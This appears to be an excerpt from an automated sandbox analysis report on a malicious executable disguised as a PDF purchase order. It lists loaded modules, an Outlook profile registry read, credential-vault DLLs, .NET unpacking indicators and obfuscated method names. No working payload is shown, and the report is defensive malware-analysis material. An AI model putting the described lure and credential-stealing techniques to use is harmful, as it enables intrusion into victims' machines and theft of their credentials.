                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\shutdown.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\shutdown.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\shutdown.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\shutdown.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\shutdown.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\shutdown.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\shutdown.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\shutdown.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\shutdown.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\shutdown.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\shutdown.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\shutdown.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\shutdown.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\shutdown.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\shutdown.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\shutdown.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\shutdown.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\shutdown.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\shutdown.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\shutdown.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\shutdown.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\shutdown.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\shutdown.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\shutdown.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: New PO [FK4-7173].pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: New PO [FK4-7173].pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: MKVNVRSuoK.exe, 00000006.00000002.4472639684.0000000000FEE000.00000002.00000001.01000000.0000000C.sdmp, MKVNVRSuoK.exe, 00000009.00000002.4472854641.0000000000FEE000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: New PO [FK4-7173].pdf.exe, 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, shutdown.exe, 00000007.00000002.4473382141.00000000030DE000.00000040.00001000.00020000.00000000.sdmp, shutdown.exe, 00000007.00000003.2220089885.0000000002D94000.00000004.00000020.00020000.00000000.sdmp, shutdown.exe, 00000007.00000002.4473382141.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, shutdown.exe, 00000007.00000003.2215761146.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: shutdown.pdbGCTL source: New PO [FK4-7173].pdf.exe, 00000004.00000002.2216024662.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp, MKVNVRSuoK.exe, 00000006.00000002.4472730066.0000000001088000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: New PO [FK4-7173].pdf.exe, New PO [FK4-7173].pdf.exe, 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, shutdown.exe, shutdown.exe, 00000007.00000002.4473382141.00000000030DE000.00000040.00001000.00020000.00000000.sdmp, shutdown.exe, 00000007.00000003.2220089885.0000000002D94000.00000004.00000020.00020000.00000000.sdmp, shutdown.exe, 00000007.00000002.4473382141.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, shutdown.exe, 00000007.00000003.2215761146.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: shutdown.pdb source: New PO [FK4-7173].pdf.exe, 00000004.00000002.2216024662.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp, MKVNVRSuoK.exe, 00000006.00000002.4472730066.0000000001088000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: 0.2.New PO [FK4-7173].pdf.exe.3fa9470.0.raw.unpack, s4LIgWXFUhDin6PApX.cs.Net Code: JTpn9OjJvsO8Q3dG728 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.New PO [FK4-7173].pdf.exe.9540000.5.raw.unpack, s4LIgWXFUhDin6PApX.cs.Net Code: JTpn9OjJvsO8Q3dG728 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.New PO [FK4-7173].pdf.exe.6fd0000.4.raw.unpack, XlF5VlCIHRSQX8M5eh.cs.Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
                Source: 0.2.New PO [FK4-7173].pdf.exe.4031490.1.raw.unpack, s4LIgWXFUhDin6PApX.cs.Net Code: JTpn9OjJvsO8Q3dG728 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.New PO [FK4-7173].pdf.exe.355e990.2.raw.unpack, XlF5VlCIHRSQX8M5eh.cs.Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 0_2_04B41348 pushfd ; ret 0_2_04B41355
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 0_2_04B770BC push esp; retn 04B6h0_2_04B77D01
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 0_2_04B78018 pushad ; ret 0_2_04B78019
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 0_2_04B77158 push esp; retn 04B6h0_2_04B77D01
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 0_2_04B7BF30 push eax; ret 0_2_04B7BF43
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 0_2_04B7BF50 push eax; ret 0_2_04B7BF43
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 0_2_04B7B82F push eax; mov dword ptr [esp], ecx0_2_04B7B844
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 0_2_04B7B840 push eax; mov dword ptr [esp], ecx0_2_04B7B844
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 0_2_05135E4D push edx; retf 0_2_05135E4E
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 0_2_07054668 push es; iretd 0_2_0705498E
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 0_2_07057FA3 push esi; iretd 0_2_07057FAE
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 0_2_07058500 push edi; iretd 0_2_070587C6
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 0_2_07056580 pushad ; iretd 0_2_0705659A
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 0_2_0705B5F1 push 696004E0h; iretd 0_2_0705B5FE
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 0_2_07053C37 push ebx; iretd 0_2_07053C42
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 0_2_07053C43 push ebp; iretd 0_2_07053C52
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 0_2_07050497 push ds; iretd 0_2_07050498
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 0_2_07058218 push edi; iretd 0_2_0705829E
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 0_2_07058291 push edi; iretd 0_2_0705829E
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 0_2_07058131 push edi; iretd 0_2_0705813E
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 0_2_07058140 push edi; iretd 0_2_07058216
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 0_2_07058010 push esi; iretd 0_2_0705801E
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 0_2_07058030 push esi; iretd 0_2_0705803E
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_00401850 push esi; retf 4_2_00401868
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0040502C push ebx; ret 4_2_00405035
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0041A953 pushad ; retf 4_2_0041A954
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0041A92C push edi; iretd 4_2_0041A92D
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_004159D5 push esp; retf 4_2_004159D8
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0040D1FB push ebp; ret 4_2_0040D244
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_00401AC1 pushad ; retf 4_2_00401AC4
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_004033E0 push eax; ret 4_2_004033E2
                Source: New PO [FK4-7173].pdf.exeStatic PE information: section name: .text entropy: 7.953409708030674
                Source: 0.2.New PO [FK4-7173].pdf.exe.3fa9470.0.raw.unpack, DoSAgyyGpW5rUqvbm9.csHigh entropy of concatenated method names: 'Ww86ZiJJux', 'rQo6iT9fgx', 'y4C6NlAwEu', 'l1f6yclmld', 'jSi6U6jA9i', 'oSb6DBeqvO', 'LFd63B6DCM', 'SXL6PgUWXG', 'JDm6btvT65', 'hVa6HBS5Jn'
                Source: 0.2.New PO [FK4-7173].pdf.exe.3fa9470.0.raw.unpack, oKNRk7wlowyM08kX7P.csHigh entropy of concatenated method names: 'ToString', 'hYMDhIGMZu', 'BJ6DKQZSaQ', 'mPwDchwaCw', 'vcCDRRCEUW', 'MV1D5RcYwl', 'TtgDSQ8sB9', 'isHDeN298L', 'MRTDneYJ1k', 'oWuDkRUGO2'
                Source: 0.2.New PO [FK4-7173].pdf.exe.3fa9470.0.raw.unpack, cIdfpdCoOPLN52Sw2QB.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'tfjHsC66nY', 'hUWHBsI975', 'YaLHwKfEiY', 'VH2H2WXbaD', 'f3fH7P2mj7', 'vFGHj05lol', 'SPxHLNsY8q'
                Source: 0.2.New PO [FK4-7173].pdf.exe.3fa9470.0.raw.unpack, ndCnPxzKyFK3jahlRe.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'C2tbO7sKiQ', 'jgHbUV4d00', 'E0GbDoClxR', 'B06b3EUlse', 'n84bPimLv0', 'ycNbbK74k1', 'eiebHUWlMO'
                Source: 0.2.New PO [FK4-7173].pdf.exe.3fa9470.0.raw.unpack, AG5TKjGmdswZbp1isL.csHigh entropy of concatenated method names: 'PvMONT3g9V', 'wQ0Oyb6YfH', 'T3iO9uHlV5', 'n9SOKYxe6c', 'DUYORH1fBZ', 'ooLO5YFxJJ', 'zNZOeJUWwX', 'FCXOn3n4y5', 'qRKOpWVnLd', 'B45Ohf5NdT'
                Source: 0.2.New PO [FK4-7173].pdf.exe.3fa9470.0.raw.unpack, OdgqxR2UpXNIuKtEvX.csHigh entropy of concatenated method names: 'rPo3V1ClBB', 'xsK31VG76A', 'ToString', 'JSj3xhkyQx', 'pbQ3EOQTCd', 'gsm36jFtOQ', 'ao13t4qMd8', 'DBk3r0bop4', 'KcM3uFSeDo', 'CZG3XkG3tC'
                Source: 0.2.New PO [FK4-7173].pdf.exe.3fa9470.0.raw.unpack, pqexlUCFjIpqGqFV97F.csHigh entropy of concatenated method names: 'EmDbAwUc69', 'Hjnbvp0KB6', 'pqubIV5HW7', 'JytbZrg2Bw', 'stebftmniJ', 'icLbiTZY7Y', 'PKRb8KtQVS', 'iA3bN8I6YN', 'IvobysV7KV', 'qnqbYj7q5V'
                Source: 0.2.New PO [FK4-7173].pdf.exe.3fa9470.0.raw.unpack, ocmU7eNMB7cxPKDXQ0.csHigh entropy of concatenated method names: 'q1KEs51P7X', 'eiLEBZIYbC', 'gfsEwfopLa', 'p2HE2dE6Rw', 'fQNE7CctSu', 'GX2EjECqyG', 'RVjELfb1TL', 'se1E0dhRU1', 'jiuEQCdyQd', 'mKdETU9cAs'
                Source: 0.2.New PO [FK4-7173].pdf.exe.3fa9470.0.raw.unpack, BBoeqVTcNItb4iJcWG.csHigh entropy of concatenated method names: 'OLKbCISeEo', 'rKhbop7xvK', 'ETub4hKpim', 'NTmbxyow9s', 'u3pbEsXnpZ', 'ouRbt0ca8l', 'A12brC5Djr', 'sgcPL3SyI2', 'UqPP0i9Oyt', 'VJXPQGND7s'
                Source: 0.2.New PO [FK4-7173].pdf.exe.3fa9470.0.raw.unpack, WQh59WeKwhIFFeMBLE.csHigh entropy of concatenated method names: 'rZOux9bRrS', 'vJru6BGAgX', 'h6turjg4qN', 'KcUrTUpxnr', 'zEtrzREASJ', 'vWIuF0XNJ5', 'SMnuCPxcnU', 'mynuWAytMa', 'FRHuoKRFJe', 'NVEu47rpst'
                Source: 0.2.New PO [FK4-7173].pdf.exe.3fa9470.0.raw.unpack, YTsf5p0UqIULUcPHE3.csHigh entropy of concatenated method names: 'MwrPx3Nql8', 'cCWPEH7Yq4', 'LfdP6RqlrA', 'MTUPtg75wm', 'HOyPr3ENeg', 'WdbPuHWgHS', 'Y8GPX2SQtB', 'Jb1Pliu3BE', 'CP6PVlsZ4l', 'BUvP1rWKvf'
                Source: 0.2.New PO [FK4-7173].pdf.exe.3fa9470.0.raw.unpack, E4gE8U6RQrGHXDU1Xf.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'KGQWQN3Nfk', 'iigWTDbPRx', 'ybhWzirZG3', 'zlPoF4Z9R7', 'ShPoCaQVTv', 'pNhoWLieDd', 'tO8ooW5nLv', 'Ov9Z6ajCIZPYH1fcgCQ'
                Source: 0.2.New PO [FK4-7173].pdf.exe.3fa9470.0.raw.unpack, mNeFugjRsHWDb5EIoQ.csHigh entropy of concatenated method names: 'iRE30qxlCt', 'RrM3T0T4OB', 'mhUPFCtNXa', 'V8LPCv020D', 'yuN3h78gFI', 'v9h3mKYvg8', 'YQc3GnyVVq', 'yqY3s0a6ir', 'SJZ3BIX089', 'jdo3w6fsuA'
                Source: 0.2.New PO [FK4-7173].pdf.exe.3fa9470.0.raw.unpack, fbFx0AYT6tZKydK92a.csHigh entropy of concatenated method names: 'sCptfb417k', 'aLZt8jQKBU', 'y5F6cuMiAN', 'PSG6Rnlmb2', 'xDM65vt7vg', 's6a6S9RF0o', 'k6r6eNGs1Q', 'OeO6nnHZjI', 'iPN6komghm', 'SYm6psLaog'
                Source: 0.2.New PO [FK4-7173].pdf.exe.3fa9470.0.raw.unpack, JfXSSmQwoak75HoTlP.csHigh entropy of concatenated method names: 'q2NP9C6IRy', 'IpPPKToKWZ', 'L1fPceXZkf', 'HO3PRqYWic', 'mo7PsjdZVr', 'J0YP5fxiPN', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.New PO [FK4-7173].pdf.exe.3fa9470.0.raw.unpack, VEggWg42tB04EDLaLZ.csHigh entropy of concatenated method names: 'QTOCucmU7e', 'vB7CXcxPKD', 'EGpCVW5rUq', 'zbmC19xbFx', 'vK9CU2a9LV', 'iYFCDELm4m', 'AkcQRRGcZvjYBfFRnl', 'IeFj5yfxhHvUiSMl0K', 'SgxCCQvUtZ', 'QHbCoG5tCD'
                Source: 0.2.New PO [FK4-7173].pdf.exe.3fa9470.0.raw.unpack, s4LIgWXFUhDin6PApX.csHigh entropy of concatenated method names: 'WnMog7sv2J', 'os9oxcCuer', 'vuMoEgISqw', 'ksbo6uFrJ2', 'BxaotBrIn7', 'Dqkorv5Gkb', 'H4iou6tl0r', 'RTNoXyPbuY', 'tkHolEdTCr', 'Ke4oVoN1uF'
                Source: 0.2.New PO [FK4-7173].pdf.exe.3fa9470.0.raw.unpack, cDWeU6S1tQc6onVTG1.csHigh entropy of concatenated method names: 'f2drwu6oKN', 'UMCr2e9yav', 'F4ir7MNmMA', 'ToString', 'gWqrjTDoKJ', 'anWrLE5eva', 'ctVdUYuh3Z09BHcwayK', 'Xc4t93usD3rYrPbqMUb', 'PiKAZfuIIe3xFxfQSR5'
                Source: 0.2.New PO [FK4-7173].pdf.exe.3fa9470.0.raw.unpack, F3XkWwW7Tq5wlTMV10.csHigh entropy of concatenated method names: 'fb6I63dq5', 'xhoZQkL7x', 'oEki30qfx', 'noL8BQHOS', 'wWQyEmbvx', 'A4CYQLW4P', 'qXsDW0r6qCIfRUZhGe', 'dyjme8yBGheeb6H0vv', 'nsaPer8ct', 'IerHIZpsX'
                Source: 0.2.New PO [FK4-7173].pdf.exe.3fa9470.0.raw.unpack, muHEUFkxknZL51WtRL.csHigh entropy of concatenated method names: 'A93uA1MOuV', 'D7duvqXa0a', 'AhduIDrdfl', 'AHkuZijdw4', 'fYJuf1GVnV', 'shKuiDw60c', 'n17u8Du54x', 'hT2uNdK44Q', 'tdauyUoqFJ', 'n0NuYchYHk'
                Source: 0.2.New PO [FK4-7173].pdf.exe.3fa9470.0.raw.unpack, GLVrYF9ELm4ma5cr3G.csHigh entropy of concatenated method names: 'B3FrgqFWHo', 'g8YrEupdmq', 'IhFrtNgOd1', 'e6oru5UTNC', 'Px6rXS6cMR', 'J6Rt7b0Qqv', 'OU3tjEodly', 'gNEtLj4QGj', 'Ebrt0inRE1', 'FdptQfinQ9'
                Source: 0.2.New PO [FK4-7173].pdf.exe.3fa9470.0.raw.unpack, M8mN3oE13atGHtcFI1.csHigh entropy of concatenated method names: 'Dispose', 'teXCQnPJO6', 'A7aWKJPqwb', 'i17NNqCR0c', 'sTTCTsf5pU', 'uIUCzLUcPH', 'ProcessDialogKey', 'g35WFfXSSm', 'SoaWCk75Ho', 'YlPWWfBoeq'
                Source: 0.2.New PO [FK4-7173].pdf.exe.9540000.5.raw.unpack, DoSAgyyGpW5rUqvbm9.csHigh entropy of concatenated method names: 'Ww86ZiJJux', 'rQo6iT9fgx', 'y4C6NlAwEu', 'l1f6yclmld', 'jSi6U6jA9i', 'oSb6DBeqvO', 'LFd63B6DCM', 'SXL6PgUWXG', 'JDm6btvT65', 'hVa6HBS5Jn'
                Source: 0.2.New PO [FK4-7173].pdf.exe.9540000.5.raw.unpack, oKNRk7wlowyM08kX7P.csHigh entropy of concatenated method names: 'ToString', 'hYMDhIGMZu', 'BJ6DKQZSaQ', 'mPwDchwaCw', 'vcCDRRCEUW', 'MV1D5RcYwl', 'TtgDSQ8sB9', 'isHDeN298L', 'MRTDneYJ1k', 'oWuDkRUGO2'
                Source: 0.2.New PO [FK4-7173].pdf.exe.9540000.5.raw.unpack, cIdfpdCoOPLN52Sw2QB.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'tfjHsC66nY', 'hUWHBsI975', 'YaLHwKfEiY', 'VH2H2WXbaD', 'f3fH7P2mj7', 'vFGHj05lol', 'SPxHLNsY8q'
                Source: 0.2.New PO [FK4-7173].pdf.exe.9540000.5.raw.unpack, ndCnPxzKyFK3jahlRe.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'C2tbO7sKiQ', 'jgHbUV4d00', 'E0GbDoClxR', 'B06b3EUlse', 'n84bPimLv0', 'ycNbbK74k1', 'eiebHUWlMO'
                Source: 0.2.New PO [FK4-7173].pdf.exe.9540000.5.raw.unpack, AG5TKjGmdswZbp1isL.csHigh entropy of concatenated method names: 'PvMONT3g9V', 'wQ0Oyb6YfH', 'T3iO9uHlV5', 'n9SOKYxe6c', 'DUYORH1fBZ', 'ooLO5YFxJJ', 'zNZOeJUWwX', 'FCXOn3n4y5', 'qRKOpWVnLd', 'B45Ohf5NdT'
                Source: 0.2.New PO [FK4-7173].pdf.exe.9540000.5.raw.unpack, OdgqxR2UpXNIuKtEvX.csHigh entropy of concatenated method names: 'rPo3V1ClBB', 'xsK31VG76A', 'ToString', 'JSj3xhkyQx', 'pbQ3EOQTCd', 'gsm36jFtOQ', 'ao13t4qMd8', 'DBk3r0bop4', 'KcM3uFSeDo', 'CZG3XkG3tC'
                Source: 0.2.New PO [FK4-7173].pdf.exe.9540000.5.raw.unpack, pqexlUCFjIpqGqFV97F.csHigh entropy of concatenated method names: 'EmDbAwUc69', 'Hjnbvp0KB6', 'pqubIV5HW7', 'JytbZrg2Bw', 'stebftmniJ', 'icLbiTZY7Y', 'PKRb8KtQVS', 'iA3bN8I6YN', 'IvobysV7KV', 'qnqbYj7q5V'
                Source: 0.2.New PO [FK4-7173].pdf.exe.9540000.5.raw.unpack, ocmU7eNMB7cxPKDXQ0.csHigh entropy of concatenated method names: 'q1KEs51P7X', 'eiLEBZIYbC', 'gfsEwfopLa', 'p2HE2dE6Rw', 'fQNE7CctSu', 'GX2EjECqyG', 'RVjELfb1TL', 'se1E0dhRU1', 'jiuEQCdyQd', 'mKdETU9cAs'
                Source: 0.2.New PO [FK4-7173].pdf.exe.9540000.5.raw.unpack, BBoeqVTcNItb4iJcWG.csHigh entropy of concatenated method names: 'OLKbCISeEo', 'rKhbop7xvK', 'ETub4hKpim', 'NTmbxyow9s', 'u3pbEsXnpZ', 'ouRbt0ca8l', 'A12brC5Djr', 'sgcPL3SyI2', 'UqPP0i9Oyt', 'VJXPQGND7s'
                Source: 0.2.New PO [FK4-7173].pdf.exe.9540000.5.raw.unpack, WQh59WeKwhIFFeMBLE.csHigh entropy of concatenated method names: 'rZOux9bRrS', 'vJru6BGAgX', 'h6turjg4qN', 'KcUrTUpxnr', 'zEtrzREASJ', 'vWIuF0XNJ5', 'SMnuCPxcnU', 'mynuWAytMa', 'FRHuoKRFJe', 'NVEu47rpst'
                Source: 0.2.New PO [FK4-7173].pdf.exe.9540000.5.raw.unpack, YTsf5p0UqIULUcPHE3.csHigh entropy of concatenated method names: 'MwrPx3Nql8', 'cCWPEH7Yq4', 'LfdP6RqlrA', 'MTUPtg75wm', 'HOyPr3ENeg', 'WdbPuHWgHS', 'Y8GPX2SQtB', 'Jb1Pliu3BE', 'CP6PVlsZ4l', 'BUvP1rWKvf'
